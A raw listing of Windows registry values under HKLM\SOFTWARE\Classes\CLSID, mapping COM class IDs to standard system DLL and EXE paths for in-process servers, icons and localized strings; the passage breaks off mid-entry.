HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e205e-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e205f-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2060-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2061-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{884e2062-217d-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8856918E-74C7-431C-B63D-3A5FDCC6AC08}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\MsDtcWmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8874E3B6-1898-4F93-84A1-8055D295617B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88753B26-5B24-49bd-B2E7-0C445C78C982}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msvproc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88866959-07B0-4ED8-8EF5-54BC7443D28C} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-12001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88866959-07B0-4ED8-8EF5-54BC7443D28C}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062} FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\zipfldr.dll,-10226 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\vdswmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8929fd8a-3967-4896-a02d-f126195af6f7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shacct.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{896664F7-12E1-490f-8782-C0835AFD98FC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{896C2B1D-3586-4FA5-B419-41F4A6D38CF1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SyncInfrastructure.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8973b4ef-7da5-4031-a333-f65609a4dcf4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89917B7C-A1A6-11DF-8BF6-18A90531A85A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhtask.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89d1d0c2-a3cf-490c-abe3-b86cde34b047}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\ReAgentTask.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819} (Default) REG_EXPAND_SZ @%systemroot%\system32\mssvp.dll,-110 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\DefaultIcon (Default) REG_EXPAND_SZ %systemroot%\system32\mssvp.dll,-504 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89D83576-6BD1-4c86-9454-BEB04E94C819}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssvp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89dc1cf7-97b5-4389-a6af-c08fb4d5a408}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\MitigationClient.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{89EA5B5A-D01C-4560-A874-9FC92AFB0EFA}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\NaturalLanguage6.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8A03E749-672E-446E-BF1F-2C11D233B6FF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8A0A83A7-7A6D-48D6-8F3D-9029D8A76E06}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8A1A8BB1-242F-431A-9F5B-254BA754631C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\usosvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8A22069C-1EF7-45D2-A409-219540D00A76}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanpref.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8A23E65E-31C2-11d0-891C-00A024AB2DBB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dsquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8A23E65E-31C2-11d0-891C-00A024AB2DBB}\StartFindEntries\{B577F070-7EE2-11D0-913F-00AA00C16E65} Icon REG_EXPAND_SZ %SystemRoot%\system32\dsquery.dll,2 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\dsquery.dll,-173 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8A3E2E1E-A40B-4650-9FB4-30072A68E661}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8A44FFB7-8140-432F-BEC5-1B5FF725BAC8}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8A667154-F9CB-11D2-AD8A-0060B0575ABC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dswave.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8a7cae0e-5951-49cb-bf20-ab3fa1e44b01} DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\fontext.dll,-199 Icon REG_EXPAND_SZ %SystemRoot%\system32\fontext.dll,10 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8a7cae0e-5951-49cb-bf20-ab3fa1e44b01}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\fontext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8A89CB2C-1ED0-4709-A39C-FC34115DD660}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8A99553A-7971-4445-93B5-AAA43D1433C5}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\sppcomapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8A9B1CDD-FCD7-419c-8B44-42FD17DB1887}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\UIAnimation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8ac3587a-4ae7-42d8-99e0-0a6013eef90f}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8ADD018C-5C5F-43C5-BE1E-07BAE85593B7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\listsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8ADE5386-8E9B-4F4C-ACF2-F0008706B238}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8aeff2c9-c97f-47b6-b27c-bd5969fe94d0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8B19C1CD-C80C-4AEC-AAE2-4E39FEDD24D0}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\MDMSettingsProv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8b20cd60-0f29-11cf-abc4-02608c9e7553}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\adsnt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8b455e45-7cc8-4253-af5b-b2cd3313e9cc}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncHost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8B918B82-7985-4C24-89DF-C33AD2BBFBCD}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BE38B01-5124-478D-BF64-B487D2FC79C0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\peopleband.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8be9f5ea-e746-4e47-ad57-3fb191ca1eed}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BEBCE8B-1AF0-4323-8B4D-36994567CAE1}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmiprvsd.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8bf9a910-a8ff-457f-999f-a5ca10b4a885}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SmartcardCredentialProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8bfc4ca2-441f-4a4f-9891-4e6a6d5d2745}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WwanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8C0A1AC2-C6B3-447D-B971-35204B263972}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wpncore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8C1645B0-9864-465E-BE75-990B030E4B11}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8c2031f1-b169-4e7c-9cb0-56f18d7b0c01}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\iasrecst.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8C334A55-DDB9-491c-817E-35A6B85D2ECB}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassam.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8c4fb173-81ae-4399-9208-591a574a893f}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WwanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8c4fb175-81ae-4399-9208-591a574a893f}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wwanconn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8C7461EF-2B13-11d2-BE35-3078302C2030}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8c7eaf13-fbd6-4ed8-ac79-fb12fcd71326}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sdengin2.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8C89071F-452E-4E95-9682-9D1024627172}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8CF89BCB-394C-49b2-AE28-A59DD4ED7F68}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8d14113b-5715-4714-8a20-69fc343626de}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\propsys.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8D1C559D-84F0-4BB3-A7D5-56A7435A9BA6}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\fastprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8d1e5d4b-a99c-4408-b0f0-ccab9e5835a1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8D750ED5-F41E-4DD0-BF17-B1A53741BB5B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8D759BEE-4828-47ad-9B19-F873D5E0F945}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobewirelessplugin.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8d80504a-0826-40c5-97e1-ebc68f953792}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\propsys.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8D8B8E30-C451-421B-8553-D2976AFA648C}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mobsync.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8D9945C3-A621-4F52-8641-6D8B755F42E2}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioses.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8DA6DB1C-8114-40c6-9D97-D2E7E9757D67}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mssvp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8DB0224B-3D65-4F6F-8E12-BEB4B78B8974}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfnetsrc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8DBEF13F-1948-4AA8-8CF0-048EEBED95D8}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8DDA2943-4787-4B48-9336-CAE6746DF276}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8DE39096-D24E-4DF3-B24B-1B7F770BF799}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8DE9C74C-605A-4acd-BEE3-2B222AA2D23D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\pwcreator.exe,-150 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\pwcreator.exe,-151 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\pwcreator.exe,-2001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\pwcreator.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E67B5C5-BAD3-4263-9F80-F769D50884F7} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-12001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E67B5C5-BAD3-4263-9F80-F769D50884F7}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8e827c11-33e7-4bc1-b242-8cd9a1c2b304}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8e85d0ce-deaf-4ea1-9410-fd1a2105ceb5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E871B70-0F3D-4605-8919-89A7ACBA199C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8e87e7b8-896b-4e67-bfa2-45c67d60ac3a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E908FC9-BECC-40f6-915B-F4CA0E70D03D} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\netcenter.dll,-2#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\netcenter.dll,-1#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E908FC9-BECC-40f6-915B-F4CA0E70D03D}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\netcenter.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E908FC9-BECC-40f6-915B-F4CA0E70D03D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E908FC9-BECC-40f6-915B-F4CA0E70D03D}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\netcenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8EAD3A12-B2C1-11d0-83AA-00A0C92C9D5D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmdskmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8ED392B6-23C2-4C3C-9126-D12D6BE621FD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppointmentActivation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8EE97210-FD1F-4b19-91DA-67914005F020}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8F22970F-2910-4baf-9B34-396F18318C17}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\umpowmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8f3080a6-af99-4f2e-a806-f3d5702a0444}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shacct.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8F70DED9-9E4E-4CD1-8547-C83666D055E3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8F7D49DF-F271-4913-8A85-F73ACCE31138}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8F914656-9D0A-4EB2-9019-0BF96D8A9EE6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\GPEdit.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD7E19C-3BF7-489B-A72C-846AB3678C96}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SmartcardCredentialProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\DefaultIcon (Default) REG_EXPAND_SZ %systemroot%\system32\dxp.dll,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dxp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FE3AA4C-4FFF-11E0-9EAE-3586DFD72085}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SearchFolder.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FF007D1-C3E3-44D5-86AF-2ECB5F663D7C}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FFE37E7-DDD3-434A-9DEB-1202D1BE31F7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\LocationApi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90087284-d6d6-11d0-8353-00a0c90640bf} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\devmgr.dll,-981 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90087284-d6d6-11d0-8353-00a0c90640bf}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\devmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{900be39d-6be8-461a-bc4d-b0fa71f5ecb1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wdi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{900c0763-5cad-4a34-bc1f-40cd513679d5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\hcproviders.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90511715-D0AD-4DAA-A18B-254BD3AE1CF2}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\fhsrchapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9053699F-A341-429D-9E90-EE437CF80C73}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9059f30f-4eb1-4bd2-9fdc-36f43a218f4a}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{905b55a8-77f0-4d28-80dd-e46b1412343f}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90903716-2F42-11D3-9C26-00C04F8EF87C}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90954C68-4D60-4023-A1F8-C6AF6F62E1C8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\netcenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90AE59CE-C67A-492B-A4DE-78A6EA95AF68}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wpnuserservice.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90B584D3-72AA-400F-9767-CAD866A5A2D8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ddp_ps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90b9bce2-b6db-4fd3-8451-35917ea1081b}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90BA30DD-785C-4186-9F44-B7D2EA994EA5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\coredpus.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90BE9587-37b7-477C-81A7-BA7C5C40FF81}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Engines\SR\srloc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90ED9FAA-A6E5-4671-8E50-1C060F8B9C47}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\servicing\wrpintapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90f8c90b-04e0-4e92-a186-e6e9c125d664}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{91145a83-a6c3-4181-89ff-8365f096f90d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9127081a-04b5-4044-b4c5-c7a9718e8795}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{913a6daa-57ee-4551-9ada-64d329d306a5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{914feed8-267a-4baa-b8aa-21e233792679}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9185F743-1143-4C28-86B5-BFF14F20E5C8}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{91ECFDB4-2606-43E4-8F86-E25B0CB01F1E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\sppcomapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{91f39027-217f-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{91f39028-217f-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{91f39029-217f-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{91f3902a-217f-11da-b2a4-000e7bbb2b09}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9200689A-F979-4eea-8830-0E1D6B74821F} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\recovery.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9200689A-F979-4eea-8830-0E1D6B74821F}\Elevation IconReference REG_EXPAND_SZ @%Systemroot%\System32\recovery.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9200689A-F979-4eea-8830-0E1D6B74821F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shpafact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92038079-b9ef-428f-87f0-0463fcb1272a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9207d8c7-e7c8-412e-87f8-2e61171bd291}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9209B7D1-6DA5-43E4-BCD1-F2BE497635E7}\InprocServer32 (Default) REG_EXPAND_SZ 